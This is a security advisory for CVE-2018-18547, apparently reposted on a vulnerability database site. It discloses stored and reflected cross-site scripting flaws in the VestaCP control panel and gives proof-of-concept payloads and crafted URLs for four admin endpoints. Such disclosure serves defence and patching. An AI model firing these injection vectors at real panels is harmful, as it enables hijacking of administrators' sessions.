Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

VestaCP 0.9.8-22 Cross Site Scripting

Related Vulnerabilities: CVE-2018-18547  
Publish Date: 22 Oct 2018
Author: Numan OZDEMIR
Source 
                							

                [+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:

Insert any XSS payload. I will use <img src onerror=alert(1337)>

https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file as named xss payload, using any form in your 
website.
If VestaCP user see this file in the interface, his browser will run the 
JavaScript.
So this vulnerability makes high risk.

https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS

// for secure days...

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started